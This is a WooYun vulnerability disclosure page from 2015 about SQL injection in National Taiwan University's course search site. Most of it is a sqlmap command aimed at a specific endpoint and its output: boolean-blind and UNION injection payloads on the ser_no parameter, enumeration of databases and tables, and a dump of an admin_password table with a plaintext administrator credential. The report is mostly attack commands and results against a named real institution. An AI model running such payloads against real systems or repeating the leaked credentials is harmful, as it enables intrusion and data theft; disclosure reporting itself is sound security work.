当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154228

漏洞标题:臺大課程網某處存在SQL植入漏洞(27萬課程信息泄露+acadmin明文密碼泄露)(臺灣地區)

相关厂商:國立臺灣大學

漏洞作者: 路人甲

提交时间:2015-11-20 18:35

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-20: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

臺大課程網某處存在SQL植入漏洞---27萬課程信息泄露+acadmin明文密碼泄露

详细说明:

地址:http://**.**.**.**/nol/coursesearch/print_table.php?course_id=104%2014800&class=&dpt_code=0000&ser_no=10105&semester=97-2

python sqlmap.py -u "http://**.**.**.**/nol/coursesearch/print_table.php?course_id=104%2014800&class=&dpt_code=0000&ser_no=10105&semester=97-2" -p ser_no --technique=BU --random-agent --batch -D public -T admin_password -C account,password --dump


Database: public
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| aca_course              | 274528  |


Database: public
Table: aca_course
[44 columns]
+---------------+---------+
| Column        | Type    |
+---------------+---------+
| year          | varchar |
| chgitem       | varchar |
| class_no      | varchar |
| co_chg        | varchar |
| co_gmark      | varchar |
| co_rep        | varchar |
| co_select     | varchar |
| co_tp         | varchar |
| cou_teacno    | varchar |
| course_no     | varchar |
| credit        | varchar |
| crs_cname     | varchar |
| crs_ename     | varchar |
| day1          | varchar |
| day2          | varchar |
| day3          | varchar |
| day4          | varchar |
| day5          | varchar |
| day6          | varchar |
| day7          | varchar |
| dpt_abbr      | varchar |
| dpt_code      | bpchar  |
| engmark       | bpchar  |
| eno           | float8  |
| forh          | varchar |
| limited       | varchar |
| mark          | varchar |
| place         | varchar |
| place_2       | varchar |
| place_3       | varchar |
| place_4       | varchar |
| place_5       | varchar |
| place_6       | varchar |
| pre_course    | bpchar  |
| sel_code      | varchar |
| semester      | varchar |
| ser_no        | varchar |
| sno           | float8  |
| tea_code      | varchar |
| teacher_cname | varchar |
| teacher_ename | varchar |
| tno           | float8  |
| week          | varchar |
| year_code     | varchar |
+---------------+---------+


Database: public
Table: admin_password
[3 entries]
+---------+------------+
| account | password   |
+---------+------------+
| 1       | 2          |
| 2       | 1          |
| acadmin | acadmin123 |
+---------+------------+

漏洞证明:

---
Parameter: ser_no (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=10105' AND 8244=8244 AND 'rMil'='rMil&semester=97-2
    Type: UNION query
    Title: Generic UNION query (NULL) - 46 columns
    Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=-7548' UNION ALL SELECT 'qxzzq'||'HxXjWdBxPJejOJUThPKDuDfpOgdqrpDnliAuofXh'||'qvpvq',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&semester=97-2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: PostgreSQL
current user:    'curri'
current user is DBA:    False
database management system users [2]:
[*] curri
[*] postgres
Database: public
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| aca_course              | 274528  |
| ifcrftr                 | 86190   |
| english                 | 12168   |
| ifcrfte                 | 5972    |
| tea_emp                 | 5654    |
| cou3                    | 4889    |
| counter                 | 2138    |
| cou2                    | 1812    |
| ifcrfcr                 | 852     |
| ifcrfyl                 | 750     |
| com                     | 670     |
| cougrp                  | 612     |
| coudept                 | 348     |
| dep_unit                | 314     |
| inengtech               | 304     |
| commopt                 | 172     |
| asforcou                | 69      |
| ifcrfsl                 | 58      |
| ifcrfyln                | 31      |
| sys_config              | 9       |
| bulletin                | 6       |
| admin_password          | 3       |
| user_session            | 1       |
+-------------------------+---------+
Database: information_schema
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| sql_features            | 439     |
| sql_sizing              | 23      |
| sql_implementation_info | 12      |
| sql_packages            | 10      |
| sql_languages           | 2       |
+-------------------------+---------+
Database: pg_catalog
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| pg_depend               | 4253    |
| pg_attribute            | 2742    |
| pg_proc                 | 1859    |
| pg_description          | 1677    |
| pg_operator             | 643     |
| pg_class                | 345     |
| pg_amop                 | 338     |
| pg_type                 | 329     |
| pg_cast                 | 256     |
| pg_index                | 130     |
| pg_conversion           | 116     |
| pg_amproc               | 109     |
| pg_aggregate            | 75      |
| pg_opclass              | 73      |
| pg_rewrite              | 66      |
| pg_attrdef              | 14      |
| pg_constraint           | 9       |
| pg_pltemplate           | 6       |
| pg_namespace            | 5       |
| pg_am                   | 4       |
| pg_database             | 4       |
| pg_language             | 4       |
| pg_trigger              | 3       |
| pg_tablespace           | 2       |
| pg_shdepend             | 1       |
+-------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: pg_catalog
Table: pg_authid
[1 column]
+-------------+------+
| Column      | Type |
+-------------+------+
| rolpassword | text |
+-------------+------+
Database: pg_catalog
Table: pg_shadow
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| passwd | text |
+--------+------+
Database: pg_catalog
Table: pg_user
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| passwd | text |
+--------+------+
Database: pg_catalog
Table: pg_roles
[1 column]
+-------------+------+
| Column      | Type |
+-------------+------+
| rolpassword | text |
+-------------+------+
Database: public
Table: guest_info
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: public
Table: theguest
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: public
Table: admin_password
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: public
Table: admin_password_index
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: public
Table: admin_password_pri
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: pg_catalog
Table: pg_user
[2 entries]
+----------+
| passwd   |
+----------+
| ******** |
| ******** |
+----------+
Database: pg_catalog
Table: pg_roles
[2 entries]
+-------------+
| rolpassword |
+-------------+
| ********    |
| ********    |
+-------------+
Database: public
Table: admin_password
[3 entries]
+------------+
| password   |
+------------+
| 1          |
| 2          |
| acadmin123 |
+------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ser_no (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=10105' AND 8244=8244 AND 'rMil'='rMil&semester=97-2
    Type: UNION query
    Title: Generic UNION query (NULL) - 46 columns
    Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=-7548' UNION ALL SELECT 'qxzzq'||'HxXjWdBxPJejOJUThPKDuDfpOgdqrpDnliAuofXh'||'qvpvq',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&semester=97-2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: PostgreSQL
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ser_no (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=10105' AND 8244=8244 AND 'rMil'='rMil&semester=97-2
    Type: UNION query
    Title: Generic UNION query (NULL) - 46 columns
    Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=-7548' UNION ALL SELECT 'qxzzq'||'HxXjWdBxPJejOJUThPKDuDfpOgdqrpDnliAuofXh'||'qvpvq',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&semester=97-2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: PostgreSQL
Database: public
Table: aca_course
[44 columns]
+---------------+---------+
| Column        | Type    |
+---------------+---------+
| year          | varchar |
| chgitem       | varchar |
| class_no      | varchar |
| co_chg        | varchar |
| co_gmark      | varchar |
| co_rep        | varchar |
| co_select     | varchar |
| co_tp         | varchar |
| cou_teacno    | varchar |
| course_no     | varchar |
| credit        | varchar |
| crs_cname     | varchar |
| crs_ename     | varchar |
| day1          | varchar |
| day2          | varchar |
| day3          | varchar |
| day4          | varchar |
| day5          | varchar |
| day6          | varchar |
| day7          | varchar |
| dpt_abbr      | varchar |
| dpt_code      | bpchar  |
| engmark       | bpchar  |
| eno           | float8  |
| forh          | varchar |
| limited       | varchar |
| mark          | varchar |
| place         | varchar |
| place_2       | varchar |
| place_3       | varchar |
| place_4       | varchar |
| place_5       | varchar |
| place_6       | varchar |
| pre_course    | bpchar  |
| sel_code      | varchar |
| semester      | varchar |
| ser_no        | varchar |
| sno           | float8  |
| tea_code      | varchar |
| teacher_cname | varchar |
| teacher_ename | varchar |
| tno           | float8  |
| week          | varchar |
| year_code     | varchar |
+---------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ser_no (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=10105' AND 8244=8244 AND 'rMil'='rMil&semester=97-2
    Type: UNION query
    Title: Generic UNION query (NULL) - 46 columns
    Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=-7548' UNION ALL SELECT 'qxzzq'||'HxXjWdBxPJejOJUThPKDuDfpOgdqrpDnliAuofXh'||'qvpvq',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&semester=97-2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: PostgreSQL
Database: public
Table: admin_password
[2 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| account  | varchar |
| password | varchar |
+----------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ser_no (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=10105' AND 8244=8244 AND 'rMil'='rMil&semester=97-2
    Type: UNION query
    Title: Generic UNION query (NULL) - 46 columns
    Payload: course_id=104 14800&class=&dpt_code=0000&ser_no=-7548' UNION ALL SELECT 'qxzzq'||'HxXjWdBxPJejOJUThPKDuDfpOgdqrpDnliAuofXh'||'qvpvq',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&semester=97-2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: PostgreSQL
Database: public
Table: admin_password
[3 entries]
+---------+------------+
| account | password   |
+---------+------------+
| 1       | 2          |
| 2       | 1          |
| acadmin | acadmin123 |
+---------+------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-11-24 08:13

厂商回复:

感謝通報

最新状态:

暂无